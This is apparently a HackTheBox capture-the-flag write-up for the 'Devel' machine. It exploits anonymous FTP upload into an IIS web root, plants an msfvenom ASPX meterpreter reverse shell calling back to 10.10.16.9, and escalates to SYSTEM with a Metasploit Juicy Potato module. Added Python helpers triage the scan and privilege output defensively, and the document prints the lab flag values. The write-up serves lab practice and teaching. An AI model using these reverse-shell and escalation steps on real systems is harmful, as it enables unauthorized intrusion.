About

Devel, while relatively simple, demonstrates the security risks associated with some default program configurations. It is a beginner-level machine which can be completed using publicly available exploits.

Enumeration

Running the script portscan.sh (an nmap wrapper) reveals two attack vectors: FTP and HTTP.

┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ sudo portscan.sh 10.129.67.100

┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ cat PortScan\(10.129.67.100\)

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods:
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Exploitation

HTTP

Checking the index page shows the default page for IIS 7. Other than that, there doesn’t seem to be much of interest.

FTP

Next, I’ll check whether the FTP service contains any vulnerabilities. Looking at the file names from the FTP enumeration done by nmap, I realized that the root directory of the FTP server might be the same as the root directory of the web server. By comparing iisstart.htm from the FTP server and from the web server, I’m able to confirm that they are the same file.

┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ ftp ftp://10.129.67.100/iisstart.htm -apV

┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ diff iisstart.htm <(curl -s 'http://10.129.67.100/iisstart.htm')

Next, by uploading a file exploit.htm to the FTP server and reading the same file from the web server, I’m able to confirm that the two services are indeed using the same root directory. Using this knowledge, we’ll be able to upload any file, including a reverse shell payload, to the FTP server and access it via the web server.

┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ echo 'w00tw00t' > exploit.htm

┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ ftp -u ftp://10.129.67.100/exploit.htm exploit.htm -apV

┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ curl -s 'http://10.129.67.100/exploit.htm'
w00tw00t
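As an added example (not part of the original writeup), the following Python script automates what the enumeration and FTP sections above did by hand: it parses the nmap output from the enumeration section, flags anonymous FTP login and the risky TRACE method, and raises a specific finding when the anonymous FTP listing contains the files that ship in a default IIS wwwroot, which is exactly the hint that led to suspecting a shared root directory. The scan text is copied from the nmap output above; the IIS_DEFAULT_WEBROOT set and the function names are my own assumptions, not part of any tool on the page.

```python
import re

# nmap service output copied from the scan in the enumeration section above
SCAN = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods:
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# Assumption: files present in a stock IIS 7 wwwroot. Seeing them in an
# anonymous FTP listing is a strong hint that the FTP root is the web root.
IIS_DEFAULT_WEBROOT = {"iisstart.htm", "welcome.png", "aspnet_client"}

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s*(.*)$")
# ftp-anon directory listing line: date, time, <DIR> or size, file name
LISTING_RE = re.compile(
    r"^\|_?\s*\d{2}-\d{2}-\d{2}\s+\d{2}:\d{2}[AP]M\s+(?:<DIR>|\d+)\s+(\S+)$"
)


def parse_scan(text):
    """Return {port: {"service", "version", "script": [lines], "files": [names]}}."""
    ports = {}
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = int(m.group(1))
            ports[current] = {"service": m.group(2), "version": m.group(3).strip(),
                              "script": [], "files": []}
            continue
        # NSE script output is prefixed with "|" and belongs to the last port seen
        if current is None or not line.startswith("|"):
            continue
        ports[current]["script"].append(line)
        lm = LISTING_RE.match(line)
        if lm:
            ports[current]["files"].append(lm.group(1))
    return ports


def findings(text):
    """Human-readable findings a defender would want to see for this scan."""
    ports = parse_scan(text)
    has_http = any(p["service"] == "http" for p in ports.values())
    out = []
    for port, info in ports.items():
        scripts = "\n".join(info["script"])
        if info["service"] == "ftp" and "Anonymous FTP login allowed" in scripts:
            out.append(f"{port}/tcp: anonymous FTP login allowed")
            overlap = IIS_DEFAULT_WEBROOT & set(info["files"])
            if overlap and has_http:
                out.append(f"{port}/tcp: FTP root lists IIS default webroot files "
                           f"{sorted(overlap)}; FTP and HTTP may share a directory")
        if info["service"] == "http" and "TRACE" in scripts:
            out.append(f"{port}/tcp: TRACE method enabled")
    return out


if __name__ == "__main__":
    for f in findings(SCAN):
        print(f)
```

The shared-directory finding is only a heuristic; the definitive check is the one the writeup performs next (confirm that a file placed via FTP is served over HTTP). From a hardening standpoint the fix is to give the FTP site its own physical path outside the web root and to disable anonymous writes.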

Now that we’ve confirmed the vulnerability, I’ll create a reverse shell payload and upload it to the target. Since the target is hosting IIS 7, the ASPX format is used for the reverse shell payload.

┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f aspx -o exploit.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2900 bytes
Saved as: exploit.aspx

┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ ftp -u ftp://10.129.67.100/exploit.aspx exploit.aspx -apV

Finally, by triggering the uploaded payload, I’m able to gain a shell as the user IIS APPPOOL\Web.

┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ curl -s 'http://10.129.67.100/exploit.aspx'
┌──(m0nk3y@kali)-[~/HTB/Devel]
└─$ msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Sending stage (175686 bytes) to 10.129.67.100
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.67.100:49181) at 2023-09-05 09:39:15 -0400

meterpreter > getuid
Server username: IIS APPPOOL\Web

Privilege Escalation

Checking the token privileges shows that the user IIS APPPOOL\Web has SeImpersonatePrivilege, which allows us to use Juicy Potato to gain SYSTEM privileges.

c:\windows\system32\inetsrv>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
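As an added example (not part of the original writeup), here is a small Python triage helper that parses `whoami /priv` output such as the listing above and reports the privileges that matter for token-based escalation. The output text is copied from the session above; the HIGH_RISK table and the function names are my own assumptions. Note the parsing detail: the Description column for SeImpersonatePrivilege fills its width exactly, leaving a single space before State, so splitting on runs of whitespace would break; the script instead derives column boundaries from the "====" ruler line.

```python
import re

# Output of `whoami /priv` copied from the session above
PRIV_OUTPUT = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
"""

# Assumption: privileges a defender should treat as effectively SYSTEM-equivalent
# when held by a compromised service account. The first two are what the
# "Potato" family of escalations relies on.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate tokens of connecting clients",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeDebugPrivilege": "open any process, including SYSTEM ones",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
}


def _column_spans(ruler):
    """Turn a '==== ==== ====' ruler line into (start, end) slices, one per column."""
    return [(m.start(), m.end()) for m in re.finditer(r"=+", ruler)]


def parse_whoami_priv(text):
    """Return a list of (name, description, state) tuples from `whoami /priv` output."""
    rows = []
    spans = None
    for line in text.splitlines():
        if spans is None:
            # everything before the ruler is a header; the ruler defines the columns
            if line and set(line) <= {"=", " "}:
                spans = _column_spans(line)
            continue
        if not line.strip():
            continue
        # fixed-width slicing; the last column takes the remainder of the line
        cells = [line[s:e].strip() for s, e in spans[:-1]]
        cells.append(line[spans[-1][0]:].strip())
        rows.append(tuple(cells))
    return rows


def risky_privileges(text):
    """(name, state, why-it-matters) for each high-risk privilege in the token.

    A Disabled state is not a mitigation: a process can enable any privilege
    its token holds, so presence is what matters for risk."""
    return [(name, state, HIGH_RISK[name])
            for name, _desc, state in parse_whoami_priv(text)
            if name in HIGH_RISK]


if __name__ == "__main__":
    for name, state, why in risky_privileges(PRIV_OUTPUT):
        print(f"{name:30} {state:9} {why}")
```

IIS application pool identities hold SeImpersonatePrivilege by design, so a finding here is expected on any IIS host; the defensive takeaways are keeping the OS patched (MS16-075 in this case) and preventing the app pool from ever executing attacker-supplied files, which on Devel means separating the FTP root from the web root.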

Since we already have a meterpreter shell, I’ll instead use the Metasploit module exploit/windows/local/ms16_075_reflection_juicy to perform the privilege escalation and gain a shell as the user NT AUTHORITY\SYSTEM.

meterpreter > run exploit/windows/local/ms16_075_reflection_juicy LHOST=10.10.16.9 LPORT=4444

[*] Started reverse TCP handler on 10.10.16.9:4444
[+] Target appears to be vulnerable (Windows 7)
[*] Launching notepad to host the exploit...
[+] Process 2008 launched.
[*] Reflectively injecting the exploit DLL into 2008...
[*] Injecting exploit into 2008...
[*] Exploit injected. Injecting exploit configuration into 2008...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.129.67.100
[*] Meterpreter session 2 opened (10.10.16.9:4444 -> 10.129.67.100:49199) at 2023-09-05 09:50:12 -0400
[*] Session 2 created in the background.

meterpreter > sessions 2
[*] Backgrounding session 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Post Exploitation

With the shell acquired, I’m able to read the flags user.txt and root.txt.

meterpreter > cat 'C:\Users\babis\Desktop\user.txt'
0dde42c6d38fcb77056d2e62f26fa44b

meterpreter > cat 'C:\Users\Administrator\Desktop\root.txt'
4b778a2dcf40fb163b8ab3ab138b577a